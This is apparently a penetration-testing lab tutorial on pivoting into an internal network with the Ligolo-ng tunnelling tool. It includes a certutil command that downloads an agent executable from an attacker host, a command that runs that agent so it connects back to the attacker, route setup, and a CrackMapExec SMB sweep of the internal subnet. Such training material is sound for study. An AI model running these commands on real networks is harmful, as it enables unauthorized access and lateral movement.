Basic Pivoting
Basic Pivoting with Ligolo-ng
Source:
https://github.com/nicocha30/ligolo-ng
Releases:
https://github.com/nicocha30/ligolo-ng/releases
Step 1: Install Ligolo-ng
Download and Unzip Ligolo-ng: Follow the instructions from the Ligolo-ng GitHub repository to download and unzip the contents.
Step 2: Set Up the Interface
To create the interface for pivoting, you need to add a new TUN/TAP interface and bring it up.
Delete Old Interfaces (if any):
ip route list route del -net 10.0.0.0/24
Add a New Interface:
ip tuntap add user root mode tun ligolo ip link set ligolo up
This creates the interface ligolo to route traffic through the tunnel.
Step 3: Get Help with Ligolo-ng
You can always get help or view available options by running:
./proxy -h
Step 4: Start the Proxy Server (Listening)
Start the proxy server with the self-cert option, which will listen for incoming connections:
./proxy -selfcert
Step 5: Move the Agent to the Target Machine
On the target machine, use the following command to download the agent:
certutil -urlcache -f http://192.168.45.241/agent.exe agent.exe
Once the agent is downloaded, run it with the following command:
.\agent.exe -connect 192.168.45.241:11601 -ignore-cert
Here, you are connecting back to your Kali machine. Note: We're using a self-signed certificate, which is why the
-ignore-cert
option is included.
Step 6: View and Interact with Sessions
To view the active sessions, run the following in the terminal:
sessions
Choose the session by typing its number, for example, '1'. Once you are in the session, run:
ifconfig
This command shows the interfaces on the target machine, including the internal network machine, like 10.10.86.141/24
.
Step 7: Add Routing to the Pivoting Interface
To route traffic through the tunnel (pivot), you need to add the target network to your routing table.
Add a Route to access the internal network:
ip route add 10.10.86.0/24 dev ligolo
Verify the Route:
You can check if Ligolo has added the route properly with:
ip route list
Step 8: Final Step - Start the Pivoting Session
Now that the route is added, go back to your proxy server, ensure you're in the correct session, and start the proxy.
Select Session:
Choose the correct session by typing the number (e.g., '1').
session
Start Pivoting:
Run the
start
command to begin the pivot.start
Step 9: Verify the Pivoting Setup
Now that the pivot is active, you can verify access to the internal network by using CrackMapExec to check if the internal machines are resolvable.
crackmapexec smb 10.10.86.0/24
If CrackMapExec can resolve the internal machines, the pivot is successful, and you now have access to the internal network.
Last updated